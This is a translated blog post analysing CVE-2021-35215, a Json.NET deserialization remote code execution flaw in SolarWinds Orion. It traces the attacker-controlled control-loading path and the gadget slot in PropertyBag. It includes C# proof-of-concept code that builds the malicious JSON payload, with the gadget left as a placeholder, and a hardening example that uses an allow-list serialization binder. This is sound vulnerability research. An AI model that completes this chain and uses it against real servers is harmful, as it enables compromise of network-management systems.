
CVE-2021-35215 SolarWinds ActionPluginBaseView RCE

source link: https://y4er.com/post/cve-2021-35215-solarwinds-orion-platform-actionpluginbaseview-rce/


2021-10-23 Code audit CVE SolarWinds

Original analysis: https://testbnull.medium.com/50-shades-of-solarwinds-orion-deserialization-part-1-cve-2021-35215-2e5764e0e4f2

The original article already explains this clearly; I am only jotting down the gist here. Following it requires some background in .NET deserialization; see https://github.com/Y4er/dotnet-deserialization

In C:\InetPub\SolarWinds\Orion\RenderControl.aspx.cs, OnInit() loads a control. The ctrl variable it loads comes from the request, so it is attacker-controlled.

[Screenshot: 1.png]

After controlToRender = LoadControl(ctrl);, controlToRender is passed to ApplyPropertiesAndAttributes().

[Screenshot: 2.png]

The method signature requires controlToRender to be a control of type System.Web.UI.Control.

Lines 346-352 then read, from JsonData, the names and values to assign to fields of the control instance, and assign them by reflection through PropertySetter.SetProperties(). JsonData is a Dictionary<string, object> that was deserialized from the HTTP request by JavaScriptSerializer during init, so it is attacker-controlled as well.

So at this point we can invoke setters on a control class; the next step is to find a suitable control class.

That search turned up the class SolarWinds.Orion.Web.Actions.ActionPluginBaseView.

[Screenshot: 3.png]

Its setter calls ParseViewContext(); following that method shows it uses Json.NET with TypeNameHandling.Objects.

[Screenshot: 4.png]

And in JsonConvert.DeserializeObject<AlertingActionContext>(this.ViewContextJsonString, settings);, the AlertingActionContext class inherits from ActionContextBase.

[Screenshot: 5.png]

That class has a field of type MacroContext, and MacroContext in turn has a field that is a List of ContextBase.

[Screenshot: 6.png]

ContextBase is an abstract class.

[Screenshot: 7.png]

Its KnownType attributes tell us that objects of type SwisEntityContext can be placed in that List, and SwisEntityContext has a field of type PropertyBag.

[Screenshot: 8.png]

That field can hold objects of type Object.

[Screenshot: 9.png]

So our gadget can be placed there, which results in RCE.

GitHub: https://github.com/Y4er/CVE-2021-35215

using System;
using System.Collections.Generic;
using System.IO;
using Newtonsoft.Json;
using SolarWinds.InformationService.Contract2;
using SolarWinds.Orion.Core.Models.Actions.Contexts;
using SolarWinds.Orion.Core.Models.MacroParsing;

namespace ConsoleApp1
{
    class Program
    {
        static void Main(string[] args)
        {
            // Build the object graph walked above: AlertingActionContext -> MacroContext -> SwisEntityContext -> PropertyBag
            var alertingActionContext = new AlertingActionContext();
            var macroContext = new MacroContext();
            var swisEntityContext = new SwisEntityContext();
            var dictionary = new Dictionary<string, Object>();
            dictionary["1"] = new Object(); // replace here with SessionSecurityToken gadget
            var propertyBag = new PropertyBag(dictionary);
            swisEntityContext.EntityProperties = propertyBag;
            macroContext.Add(swisEntityContext);

            alertingActionContext.MacroContext = macroContext;
            // Same settings as ParseViewContext(), so the emitted "$type" hints are the ones the server honours
            JsonSerializerSettings settings = new JsonSerializerSettings
            {
                TypeNameHandling = TypeNameHandling.Objects
            };
            var serializeObject = JsonConvert.SerializeObject(alertingActionContext, settings);
            Console.WriteLine(serializeObject);
            // Write the serialized view context to disk; "using" disposes the writer even if Write throws
            using (var streamWriter =
                new StreamWriter(@"C:\Users\admin\Desktop\my\code\netcore\ConsoleApp1\ConsoleApp1\poc.json"))
            {
                // serializeObject = serializeObject.Replace("\"", "\\\"");
                streamWriter.Write(serializeObject);
            }
        }
    }
}
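As an added example (not code from the post, the original analysis or SolarWinds), the following shows why TypeNameHandling.Objects in ParseViewContext()'s settings is the root cause, and how an ISerializationBinder allow-list stops the chain at the PropertyBag slot. The stand-in classes, the Contexts property name and the payload are constructed here to mirror the shapes described above; the only "$type" smuggled in is a harmless StringBuilder.

```csharp
using System;
using System.Collections.Generic;
using Newtonsoft.Json;
using Newtonsoft.Json.Serialization;
// Constructed stand-ins with the shape described in the post; they are not the SolarWinds types.
public abstract class ContextBase { }
public class SwisEntityContext : ContextBase { public Dictionary<string, object> EntityProperties { get; set; } }
public class MacroContext { public List<ContextBase> Contexts { get; set; } = new List<ContextBase>(); }
public class AlertingActionContext { public MacroContext MacroContext { get; set; } }

// Allow-list binder: "$type" may only resolve to the ContextBase subclasses the list legitimately holds.
public class ContextAllowListBinder : ISerializationBinder
{
    public Type BindToType(string assemblyName, string typeName)
    {
        if (typeName == typeof(SwisEntityContext).FullName) return typeof(SwisEntityContext);
        throw new JsonSerializationException("Rejected $type: " + typeName); // thrown before anything is instantiated
    }
    public void BindToName(Type serializedType, out string assemblyName, out string typeName)
    {
        assemblyName = null; typeName = serializedType.FullName;
    }
}
class Program
{
    // Deserializes and reports which runtime type landed in the PropertyBag slot, or why it was refused.
    static string Probe(JsonSerializerSettings settings, string json)
    {
        try
        {
            var ctx = JsonConvert.DeserializeObject<AlertingActionContext>(json, settings);
            var swis = (SwisEntityContext)ctx.MacroContext.Contexts[0];
            return swis.EntityProperties["1"].GetType().FullName;
        }
        catch (JsonSerializationException e) { return "refused: " + e.Message; }
    }
    static void Main()
    {
        // Constructed payload: a harmless but arbitrary $type (StringBuilder) in the slot where the chain places the gadget.
        string swis = typeof(SwisEntityContext).FullName + ", " + typeof(SwisEntityContext).Assembly.GetName().Name;
        string json = "{\"MacroContext\":{\"Contexts\":[{\"$type\":\"" + swis + "\"," +
                      "\"EntityProperties\":{\"1\":{\"$type\":\"System.Text.StringBuilder\"}}}]}}";
        var weak = new JsonSerializerSettings { TypeNameHandling = TypeNameHandling.Objects }; // as in ParseViewContext()
        var hardened = new JsonSerializerSettings { TypeNameHandling = TypeNameHandling.Objects, SerializationBinder = new ContextAllowListBinder() };
        Console.WriteLine("weak:     " + Probe(weak, json));     // System.Text.StringBuilder: the request chose the type
        Console.WriteLine("hardened: " + Probe(hardened, json)); // refused: the binder rejected System.Text.StringBuilder
    }
}
```

Where no polymorphism is actually needed, TypeNameHandling.None is the simpler fix; the binder is for cases like this List<ContextBase>, where the server genuinely has to honour a small, fixed set of "$type" values.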

My writing is poor, the wording flippant, the content shallow and the handling clumsy. Pointers and corrections from the masters are very welcome; many thanks.
